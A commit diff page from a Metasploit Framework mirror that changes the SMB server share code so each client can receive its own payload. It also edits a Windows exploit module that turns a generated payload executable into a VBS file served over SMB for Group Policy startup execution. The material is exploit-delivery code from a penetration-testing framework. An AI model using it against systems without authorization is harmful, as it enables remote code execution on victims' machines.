infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

support changing files

bug/bundler_fix
jvazquez-r7 2015-04-10 16:53:12 -05:00
parent b2e17a61a9
commit ca6a5cad17
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
5 changed files with 43 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
lib/msf/core/exploit/smb/server/share/command/nt_create_andx.rb
View File

@ -26,11 +26,13 @@ module Msf
payload = file_name
end
contents = smb[:payload] || file_contents
if payload.ends_with?(file_name.downcase)
vprint_status("SMB Share - #{smb[:ip]} SMB_COM_NT_CREATE_ANDX request for #{unc}... ")
fid = smb[:file_id].to_i
attribs = CONST::SMB_EXT_FILE_ATTR_NORMAL
eof = file_contents.length
eof = contents.length
is_dir = 0
elsif folder_name && payload.ends_with?(folder_name.downcase)
fid = smb[:dir_id].to_i

5
lib/msf/core/exploit/smb/server/share/command/read_andx.rb
View File

@ -13,16 +13,19 @@ module Msf
# @param buff [String] The data including the client request.
# @return [Fixnum] The number of bytes returned to the client as response.
def smb_cmd_read_andx(c, buff)
smb = @state[c]
pkt = CONST::SMB_READ_PKT.make_struct
pkt.from_s(buff)
offset = pkt['Payload'].v['Offset']
length = pkt['Payload'].v['MaxCountLow']
contents = smb[:payload] || file_contents
send_read_andx_res(c, {
data_len_low: length,
byte_count: length,
data: file_contents[offset, length]
data: contents[offset, length]
})
end

10
lib/msf/core/exploit/smb/server/share/information_level/find.rb
View File

@ -13,10 +13,13 @@ module Msf
# @param path [String] The path which the client is requesting info from.
# @return [Fixnum] The number of bytes returned to the client as response.
def smb_cmd_find_file_both_directory_info(c, path)
smb = @state[c]
contents = smb[:payload] || file_contents
if path && path.include?(file_name.downcase)
data = Rex::Text.to_unicode(file_name)
length = file_contents.length
length = contents.length
ea = 0
alloc = 1048576 # Allocation Size = 1048576 || 1Mb
attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
@ -77,10 +80,13 @@ module Msf
# @param path [String] The path which the client is requesting info from.
# @return [Fixnum] The number of bytes returned to the client as response.
def smb_cmd_find_file_full_directory_info(c, path)
smb = @state[c]
contents = smb[:payload] || file_contents
if path && path.include?(file_name.downcase)
data = Rex::Text.to_unicode(file_name)
length = file_contents.length
length = contents.length
ea = 0
alloc = 1048576 # Allocation Size = 1048576 || 1Mb
attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL # File

17
lib/msf/core/exploit/smb/server/share/information_level/query.rb
View File

@ -33,12 +33,16 @@ module Msf
# @param fid [Fixnum] The file identifier which the client is requesting info from.
# @return [Fixnum] The number of bytes returned to the client as response.
def smb_cmd_trans_query_file_info_standard(c, fid)
smb = @state[c]
contents = smb[:payload] || file_contents
send_info_standard_res(c, {
allocation_size: 1048576,
number_links: 1,
delete_pending: 0,
directory: 0,
end_of_file: file_contents.length
end_of_file: contents.length
})
end
@ -69,6 +73,10 @@ module Msf
# @param path [String] The path which the client is requesting info from.
# @return [Fixnum] The number of bytes returned to the client as response.
def smb_cmd_trans_query_path_info_standard(c, path)
smb = @state[c]
contents = smb[:payload] || file_contents
if path && path.include?(file_name.downcase)
attrib = 0 # File attributes => file
elsif path && folder_name && path.ends_with?(folder_name.downcase)
@ -84,7 +92,7 @@ module Msf
number_links: 1,
delete_pending: 0,
directory: attrib,
end_of_file: file_contents.length
end_of_file: contents.length
})
end
@ -95,6 +103,9 @@ module Msf
# @param path [String] The path which the client is requesting info from.
# @return [Fixnum] The number of bytes returned to the client as response.
def smb_cmd_trans_query_path_info_network(c, path)
smb = @state[c]
contents = smb[:payload] || file_contents
if path && path.include?(file_name.downcase)
attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
@ -108,7 +119,7 @@ module Msf
send_info_network_res(c, {
allocation_size: 1048576,
end_of_file: file_contents.length,
end_of_file: contents.length,
file_attributes: attrib
})
end

18
modules/exploits/windows/smb/group_policy_startup.rb
View File

@ -9,7 +9,6 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::SMB::Server::Share
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
@ -63,11 +62,22 @@ class Metasploit3 < Msf::Exploit::Remote
def setup
super
exe = generate_payload_exe
self.file_contents = Msf::Util::EXE.to_exe_vbs(exe)
self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.vbs"
exe = payload.encoded_exe
self.file_contents = Msf::Util::EXE.to_exe_vbs(exe)
print_status("File available on #{unc}...")
end
=begin
def on_client_connect(client)
super(client)
smb = @state[client]
unless smb[:payload]
p = regenerate_payload(client)
exe = p.encoded_exe
smb[:payload] = Msf::Util::EXE.to_exe_vbs(exe)
end
end
=end
end